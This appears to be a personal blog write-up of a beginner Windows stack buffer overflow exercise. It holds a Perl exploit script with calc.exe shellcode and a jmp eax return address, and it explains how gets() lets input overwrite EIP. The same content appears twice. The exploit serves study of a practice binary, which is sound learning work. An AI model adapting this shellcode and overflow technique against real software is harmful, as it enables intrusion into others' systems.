Thanks to Joel Esler of VRT for helping me get on the right track, environment wise.
If a just-in-time debugger hasn't been configured, an int 3 instruction (trap debugger) prevents the executable from running in a cmd.exe shell.
Configuring Immunity Debugger as the just-in-time debugger via the Win2k Registry:
In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug
Set "Debugger" to
"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" -AEDEBUG %ld %ld
I used hexedit to change the 0xCC instruction to a 0x90 so that I could run it without the debugger kicking in.
awboprimer. My introduction to buffer overflows on Windows.
#!/usr/bin/perl
$shellcode = "\x81\xec\x00\x01\x00\x00\xfc\xe8\x44\x00\x00" .
"\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
$header = "AAAx";
$nops = "\x90" x 20;
$eip = "\xf4\x55\xed\x77"; # jmp eax
$filler = "A" x (256-length($shellcode)-length($nops));
print $header . $nops . $shellcode . $filler . $eip;
main() declares a 256 byte buffer on the stack, then calls gets(). If buffer[3] does not equal 'x', exit() is called--preventing a return from main.
264 bytes of input lets me overwrite EIP.
When main returns, ESP points to right after where main's saved EIP was. I thought I could place the shellcode here and overwrite EIP with a JMP ESP address to get there, but there wasn't enough space for the shellcode.
Looking at the other registers, EAX points to the beginning of the gets() buffer. Fortunately, the "AAAx" header turned into NOP instructions and there was enough space to put all the shellcode.
The NOPs before the shellcode were added to fix some instruction alignment issues when the shellcode executes.
If a just-in-time debugger hasn't been configured, an int 3 instruction (trap debugger) prevents the executable from running in a cmd.exe shell.
Configuring Immunity Debugger as the just-in-time debugger via the Win2k Registry:
In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug
Set "Debugger" to
"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" -AEDEBUG %ld %ld
I used hexedit to change the 0xCC instruction to a 0x90 so that I could run it without the debugger kicking in.
awboprimer. My introduction to buffer overflows on Windows.
#!/usr/bin/perl
$shellcode = "\x81\xec\x00\x01\x00\x00\xfc\xe8\x44\x00\x00" .
"\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
$header = "AAAx";
$nops = "\x90" x 20;
$eip = "\xf4\x55\xed\x77"; # jmp eax
$filler = "A" x (256-length($shellcode)-length($nops));
print $header . $nops . $shellcode . $filler . $eip;
main() declares a 256 byte buffer on the stack, then calls gets(). If buffer[3] does not equal 'x', exit() is called--preventing a return from main.
264 bytes of input lets me overwrite EIP.
When main returns, ESP points to right after where main's saved EIP was. I thought I could place the shellcode here and overwrite EIP with a JMP ESP address to get there, but there wasn't enough space for the shellcode.
Looking at the other registers, EAX points to the beginning of the gets() buffer. Fortunately, the "AAAx" header turned into NOP instructions and there was enough space to put all the shellcode.
The NOPs before the shellcode were added to fix some instruction alignment issues when the shellcode executes.
No comments:
Post a Comment